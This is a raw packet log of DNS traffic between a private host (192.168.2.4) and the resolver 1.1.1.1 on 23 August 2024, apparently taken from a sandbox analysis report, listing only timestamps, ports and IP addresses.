Aug 23, 2024 18:48:55.767354965 CEST	53	64627	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.769342899 CEST	53	56066	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.769620895 CEST	53	51615	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.769630909 CEST	53	57593	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.769676924 CEST	53	52623	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.770111084 CEST	53	61730	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.770203114 CEST	53	52484	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.771351099 CEST	53	50846	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.771611929 CEST	53	51442	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.772372007 CEST	53	56016	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.773952961 CEST	53	65137	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.774882078 CEST	53	53130	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.775213957 CEST	53	59826	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.775404930 CEST	53	58698	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.775568962 CEST	53	55811	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.776571989 CEST	53	63489	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.776582003 CEST	53	56897	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.776591063 CEST	53	58046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.777380943 CEST	53	51188	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.777506113 CEST	53	60308	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.777515888 CEST	53	57273	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.777523994 CEST	53	64604	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.780073881 CEST	53	65290	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.780164003 CEST	53	56746	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.780174971 CEST	53	62152	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.780427933 CEST	53	60987	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.780437946 CEST	53	49457	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.782243013 CEST	53	62543	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.782752991 CEST	53	64626	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.787786961 CEST	53	61506	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.788520098 CEST	53	53999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.788662910 CEST	53	52927	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.788674116 CEST	53	49875	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.792717934 CEST	53	62475	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.793431044 CEST	53	52546	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.794015884 CEST	53	64120	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.794025898 CEST	53	58722	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.794034958 CEST	53	65121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.796654940 CEST	53	52998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.796905994 CEST	53	63351	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.798624039 CEST	53	56071	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.798867941 CEST	53	62120	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.799560070 CEST	53	54875	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.799812078 CEST	53	59924	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.800276041 CEST	53	59230	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.801491022 CEST	56557	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.802109957 CEST	58310	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.802692890 CEST	62283	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.803289890 CEST	62355	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.804121971 CEST	60192	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.804783106 CEST	54087	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.805429935 CEST	62822	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.805819035 CEST	59991	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.806212902 CEST	53953	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.806632996 CEST	50574	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.806802988 CEST	62474	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.807542086 CEST	57179	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.807542086 CEST	64353	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.807985067 CEST	50292	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.808262110 CEST	63713	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.808698893 CEST	55666	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.809022903 CEST	53802	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.809190989 CEST	50936	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.809591055 CEST	56863	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.810278893 CEST	62322	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.810317039 CEST	56695	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.810864925 CEST	51650	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.810952902 CEST	60655	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.811564922 CEST	55357	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.811839104 CEST	57023	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.812417030 CEST	61000	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.812603951 CEST	65369	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.812944889 CEST	57638	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.813354015 CEST	50612	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.813709974 CEST	64282	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.813904047 CEST	50390	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.814441919 CEST	65046	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.814883947 CEST	64785	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.815319061 CEST	61993	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.815689087 CEST	55581	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.815996885 CEST	53	62283	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.816230059 CEST	60113	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.816464901 CEST	53	56557	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.816581964 CEST	59753	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.817003012 CEST	63086	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.817302942 CEST	53	54087	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.817471981 CEST	55249	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.817730904 CEST	53280	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.817823887 CEST	53	62822	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.818459034 CEST	53	53953	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.818947077 CEST	53	51650	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.819122076 CEST	53	50574	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.820060015 CEST	55028	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821233988 CEST	58967	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821295023 CEST	53	55666	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.821407080 CEST	50916	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821441889 CEST	65308	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821477890 CEST	53	50936	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.821652889 CEST	64294	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821739912 CEST	53	64353	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.821795940 CEST	50173	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821943998 CEST	61552	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.821968079 CEST	53	56863	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.822104931 CEST	56194	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.822156906 CEST	53	60655	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.822258949 CEST	55910	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.822412014 CEST	61900	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.822550058 CEST	61359	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.822819948 CEST	50904	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.823225021 CEST	62528	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.823262930 CEST	61272	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.823445082 CEST	49913	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.823606968 CEST	60057	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.823877096 CEST	63212	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824091911 CEST	63250	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824091911 CEST	51741	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824264050 CEST	50352	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824430943 CEST	62826	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824613094 CEST	54375	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824841976 CEST	49431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.824898958 CEST	63927	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.825539112 CEST	53	55357	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.825747013 CEST	53	57638	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.825911999 CEST	53	61000	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.826415062 CEST	53	64282	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.827253103 CEST	53	55581	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.828213930 CEST	53	64785	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.829629898 CEST	53	61993	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.829718113 CEST	53	60113	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.829727888 CEST	53	59753	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.837042093 CEST	53	64294	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.837084055 CEST	53	50173	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.837094069 CEST	53	65308	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.837989092 CEST	53	56194	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.838357925 CEST	53	50904	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.839447975 CEST	53	61272	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.839544058 CEST	53	58310	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.839554071 CEST	53	50916	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840101004 CEST	53	63250	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840111017 CEST	53	49913	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840126038 CEST	53	60057	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840188980 CEST	53	63927	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840198040 CEST	53	51741	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.840207100 CEST	53	62826	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.841001987 CEST	53	49431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.841012001 CEST	53	61359	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.841902971 CEST	53	62474	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.842570066 CEST	53	60192	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.843575954 CEST	53	50292	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.844208002 CEST	53	62322	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.844676971 CEST	53	63713	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.844686031 CEST	53	53802	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.845377922 CEST	53	59991	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.845387936 CEST	53	56695	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.846422911 CEST	53	65369	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.846498013 CEST	53	57179	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.846508980 CEST	53	57023	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.847553015 CEST	53	50612	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.849560022 CEST	53	50390	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.849992990 CEST	53	55249	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.850321054 CEST	53	53280	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.850534916 CEST	53	63086	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.852210045 CEST	53	55028	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.854387999 CEST	53	58967	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.856934071 CEST	53	61552	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.857652903 CEST	53	55910	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.857908964 CEST	53	61900	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.858203888 CEST	53	50352	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.859251022 CEST	53	63212	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.859792948 CEST	53	54375	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.965291977 CEST	53	62355	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.980256081 CEST	53	65046	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.991851091 CEST	53	62528	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:55.993474007 CEST	53316	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.994020939 CEST	60887	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.994740009 CEST	54024	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.995668888 CEST	59467	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.996340036 CEST	56635	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.996675014 CEST	59787	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.997113943 CEST	51475	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.997519016 CEST	51003	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.997766018 CEST	55701	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.998028040 CEST	62386	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.998550892 CEST	55008	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.999058008 CEST	56111	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.999162912 CEST	49663	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.999572039 CEST	56314	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:55.999849081 CEST	54342	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.000056982 CEST	61810	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.000531912 CEST	56642	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.000907898 CEST	58588	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.001209021 CEST	62235	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.001298904 CEST	55200	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.001737118 CEST	59494	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.001909018 CEST	61628	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.002355099 CEST	59798	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.002767086 CEST	49677	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.002947092 CEST	62581	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.003441095 CEST	56072	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.003654957 CEST	61970	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.003988981 CEST	59304	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.004519939 CEST	51161	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.004729033 CEST	64694	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.005242109 CEST	56073	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.005841970 CEST	63417	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.005856037 CEST	53	53316	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.006602049 CEST	53206	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.006711006 CEST	54952	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.006869078 CEST	50375	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.007225037 CEST	53	59467	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.007461071 CEST	52627	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.007688046 CEST	57150	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.007850885 CEST	53	59787	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.008230925 CEST	53116	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.008270025 CEST	55969	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.008872032 CEST	54714	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.009116888 CEST	53	55701	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.009375095 CEST	53	56111	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.009386063 CEST	53	62386	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.009393930 CEST	53	55008	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.009772062 CEST	53	51475	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.010576963 CEST	56598	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.010742903 CEST	58067	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.010904074 CEST	53	56314	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.010931969 CEST	54440	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.011230946 CEST	61242	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.011502028 CEST	60932	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.011538029 CEST	53	49677	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.011548996 CEST	53	58588	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.011609077 CEST	57906	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.011677980 CEST	53	61810	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.011763096 CEST	50776	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.011895895 CEST	58774	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.012356997 CEST	53	56642	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.013118029 CEST	53	61628	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.013356924 CEST	60754	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.013439894 CEST	53	62235	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.013784885 CEST	59915	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.013958931 CEST	56836	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.014250994 CEST	50546	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.014482975 CEST	61077	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.014796019 CEST	57960	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.014944077 CEST	57588	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.014960051 CEST	53	59494	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.015064955 CEST	53	62581	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.015075922 CEST	53	59304	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.015178919 CEST	62285	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.016014099 CEST	53	56072	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016168118 CEST	50166	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.016215086 CEST	53	61970	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016226053 CEST	53	64694	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016661882 CEST	50911	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.016746044 CEST	53	63417	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016828060 CEST	53	51161	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016830921 CEST	56594	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.016836882 CEST	53	56073	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.016974926 CEST	50710	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.017885923 CEST	53	54952	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.017924070 CEST	51131	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.018085957 CEST	53	53206	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.018168926 CEST	60929	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.018418074 CEST	65012	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.018610954 CEST	65400	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.019145012 CEST	53	54714	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.019155025 CEST	53	53116	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.019162893 CEST	53	52627	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.020191908 CEST	53	57150	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.020745993 CEST	53	55969	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.022108078 CEST	53	57906	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.022171974 CEST	53	54440	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.022181988 CEST	53	58067	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.022404909 CEST	53	56598	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.022416115 CEST	53	50776	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.024276972 CEST	53	56836	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.024487972 CEST	53	59915	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.025249958 CEST	53	60754	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.025963068 CEST	53	60887	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.026352882 CEST	53	61077	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.026912928 CEST	53	57588	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.028584003 CEST	53	54024	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.028594971 CEST	53	51131	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.028604031 CEST	53	56594	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.029274940 CEST	53	50911	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.029571056 CEST	53	60929	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.029669046 CEST	53	65400	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.031299114 CEST	53	58774	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.031730890 CEST	53	54342	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.033746958 CEST	53	56635	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.033757925 CEST	53	55200	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.035614967 CEST	53	49663	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.046726942 CEST	53	62285	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.047297955 CEST	53	60932	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.048623085 CEST	53	50546	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.049624920 CEST	53	50166	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.051774025 CEST	53	65012	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.052428007 CEST	53	57960	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.164192915 CEST	53	59798	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.171931028 CEST	53	51003	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.175589085 CEST	53	50375	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.193231106 CEST	53	50710	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.232753038 CEST	53	61242	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.246710062 CEST	59244	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.437424898 CEST	53	59244	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:56.956587076 CEST	54264	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.957114935 CEST	51981	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.957720995 CEST	49221	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.957720995 CEST	51906	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.958061934 CEST	59898	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.958406925 CEST	54372	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.958818913 CEST	54729	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.958905935 CEST	61530	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.959393978 CEST	59634	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.959475040 CEST	61320	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.959902048 CEST	58330	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.960303068 CEST	62660	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.960427999 CEST	61152	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.960660934 CEST	49515	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.961215019 CEST	49346	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.961456060 CEST	53995	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.961633921 CEST	50557	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.961702108 CEST	52391	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.962272882 CEST	62520	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.962899923 CEST	64713	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.963531971 CEST	49184	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.963807106 CEST	50475	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.963867903 CEST	60114	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.964345932 CEST	63293	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.964345932 CEST	54946	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.964889050 CEST	63978	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.964889050 CEST	50127	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.965409994 CEST	60539	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.965650082 CEST	65483	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:56.965650082 CEST	65397	53	192.168.2.4	1.1.1.1
